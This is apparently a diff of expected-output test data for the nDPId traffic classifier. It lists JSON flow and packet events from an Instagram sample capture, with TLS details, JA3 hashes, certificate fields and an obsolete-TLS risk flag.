-01038{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":381,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908581,"flow_last_seen":1436720908633,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1676,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1436720908633,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-g-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}} -01437{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":385,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908581,"flow_last_seen":1436720908634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4354,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1436720908634,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-g-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}} -01038{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":389,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908572,"flow_last_seen":1436720908636,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1868,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1436720908636,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-h-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"7df57c06f869fc3ce509521cae2f75ce","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}} -01437{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":393,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908572,"flow_last_seen":1436720908638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":454,"midstream":0,"thread_ts_msec":1436720908638,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-h-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"7df57c06f869fc3ce509521cae2f75ce","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}} -01038{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":398,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908576,"flow_last_seen":1436720908660,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1644,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1436720908660,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}} -01437{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":402,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908576,"flow_last_seen":1436720908661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4322,"flow_avg_l4_payload_len":432,"midstream":0,"thread_ts_msec":1436720908661,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}} -01038{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":407,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908577,"flow_last_seen":1436720908663,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1644,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1436720908663,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}} -01437{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908577,"flow_last_seen":1436720908665,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4322,"flow_avg_l4_payload_len":432,"midstream":0,"thread_ts_msec":1436720908665,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":366,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908581,"flow_last_seen":1436720908581,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720908581,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":366,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1436720908581,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908581,"pkt":"ABsv8H60QPMIw47hCABFAAA8pvhAAEAGXgvAqABnLiFGiO3sAbtrdUh\/AAAAAKACOQg15wAAAgQFtAQCCAoAA+6HAAAAAAEDAwY="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1436720908594,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908594,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGC94uIUauwKgAZwG7rg7lq\/ivshtmvaASOJCK2QAAAgQFlgQCCAquiQq2AAPuhgEDAwU="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":368,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1436720908594,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908594,"pkt":"ABsv8H60QPMIw47hCABFAAA0iDtAAEAGfKrAqABnLiFGrq4OAbuyG2a95av4sIAQAOU2BQAAAQEICgAD7oiuiQq2"} +00985{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908572,"flow_last_seen":1436720908596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1436720908596,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-h-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":370,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1436720908603,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908603,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGDAQuIUaIwKgAZwG77ezRfJMua3VIgKASOJCHDAAAAgQFlgQCCArOjo1YAAPuhwEDAwU="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1436720908603,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908603,"pkt":"ABsv8H60QPMIw47hCABFAAA0pvlAAEAGXhLAqABnLiFGiO3sAbtrdUiA0XyTL4AQAOU13wAAAQEICgAD7onOjo1Y"} +00984{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":372,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908581,"flow_last_seen":1436720908606,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1436720908606,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-g-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1436720908615,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908615,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGE75SVRqawKgAZwG7oN0D2rVm4E5xhKASOJDLywAAAgQFlgQCCApUeSUGAAPuhgEDAwU="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1436720908615,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908615,"pkt":"ABsv8H60QPMIw47hCABFAAA0nwZAAEAGbb\/AqABnUlUamqDdAbvgTnGEA9q1Z4AQAOUuJQAAAQEICgAD7opUeSUG"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1436720908616,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908616,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGE75SVRqawKgAZwG7oN5hmBQZ4jr3HqASOJCH0wAAAgQFlgQCCApUeSUGAAPuhgEDAwU="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1436720908616,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908616,"pkt":"ABsv8H60QPMIw47hCABFAAA0GZxAAEAG8ynAqABnUlUamqDeAbviOvceYZgUGoAQAOUuJQAAAQEICgAD7opUeSUG"} +00984{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":377,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908576,"flow_last_seen":1436720908617,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1436720908617,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00984{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908577,"flow_last_seen":1436720908619,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1436720908619,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01038{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":381,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908581,"flow_last_seen":1436720908633,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1676,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1436720908633,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-g-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}} +01437{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":385,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908581,"flow_last_seen":1436720908634,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4354,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1436720908634,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-g-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}} +01038{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":389,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908572,"flow_last_seen":1436720908636,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1868,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1436720908636,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-h-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"7df57c06f869fc3ce509521cae2f75ce","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}} +01437{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":393,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908572,"flow_last_seen":1436720908638,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":454,"midstream":0,"thread_ts_msec":1436720908638,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-h-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"7df57c06f869fc3ce509521cae2f75ce","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}} +01038{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":398,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908576,"flow_last_seen":1436720908660,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1644,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1436720908660,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}} +01437{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":402,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908576,"flow_last_seen":1436720908661,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4322,"flow_avg_l4_payload_len":432,"midstream":0,"thread_ts_msec":1436720908661,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}} 